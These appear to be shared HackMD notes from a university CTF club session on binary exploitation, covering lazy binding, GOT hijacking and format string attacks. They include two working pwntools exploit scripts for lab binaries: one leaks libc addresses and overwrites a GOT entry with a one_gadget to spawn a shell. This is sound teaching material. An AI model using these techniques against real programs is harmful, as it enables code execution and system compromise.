NCtfU - 3/25(r8)

# NCtfU - 3/25(r8) ###### tags: `nctfu2022spring` ## 開始時間 - PM 8:10 ## youtube link https://youtu.be/IS-UJSGvByM (需要請聯繫 r8) ## 會參加 - idisused - ppodds (不用等我，可能來不及） ## 講者筆記 [NCtfU - 3/18(r8) - HackMD](https://hackmd.io/OPpGdnptSGmfVpl0rJhRiA) ``` 安裝 pwn 工具懶人包 https://github.com/r888800009/CTF-tool/tree/master/pwn_docker ``` [修正 slide](https://drive.google.com/file/d/1Owgs8-oV2MNGKINjsfNnx9ZPK7nSYxcg/view?usp=sharing) ~~[slide](https://drive.google.com/file/d/1PyiI0tDDb3DjVNVyQ05D7whwPPGOmurq/view?usp=sharing)~~ ### outline - Lazy Binding - GOT Hijacking - Format String Attack 下次上課 - file structure exploit - vtable - Heap - link_map [回饋表單](https://docs.google.com/forms/d/e/1FAIpQLSfIw0OI3H26h6OtiP6zd9fU8l5QXyUOPqUA0QRd2O2RGHfqLQ/viewform) ## 共筆 ### got_hijack ```python= from pwn import * context.arch= 'amd64' elf = ELF('./got_hijack') p = process('./got_hijack') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') offset = (elf.got['__isoc99_scanf'] - elf.symbols['data']) // 8 print(offset) p.sendlineafter(b':', str(offset)) p.recvuntil(b'=') printf_addr = int(p.recvline().strip()) print(hex(printf_addr)) libc_base = printf_addr - libc.symbols['__isoc99_scanf'] one_gadget = libc_base + 0xe3b31 p.sendlineafter(b":",str(one_gadget)) p.interactive() ``` ### fmtstr_stack ```python= from pwn import * context.arch = 'amd64' elf = ELF('./fmtstr_stack') p = process('./fmtstr_stack') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') # one_gadget = 0xe3b31 p.sendlineafter(b'\n',b"%14$p\n%27$p\n") p.recvuntil(b"f\n") # elf_base elf_base = p.recvline().decode().strip() print(elf_base) elf_base = int(elf_base, 16) - (0x00555555554040-0x00555555554000) # start_main - lib_c libc_base = p.recvline().decode().strip() libc_base = int(libc_base, 16) - (0x007ffff7df10b3-0x007ffff7dcd000) got_puts = elf_base + elf.got['puts'] one_gadget = libc_base + 0xe3b31 payload = fmtstr_payload(8, {got_puts: one_gadget},write_size='byte',numbwritten=0) p.sendafter(b"reading\n", payload) p.interactive() ``` https://github.com/r888800009/pwn-labs/blob/main/fmtstr/fmtstr_stack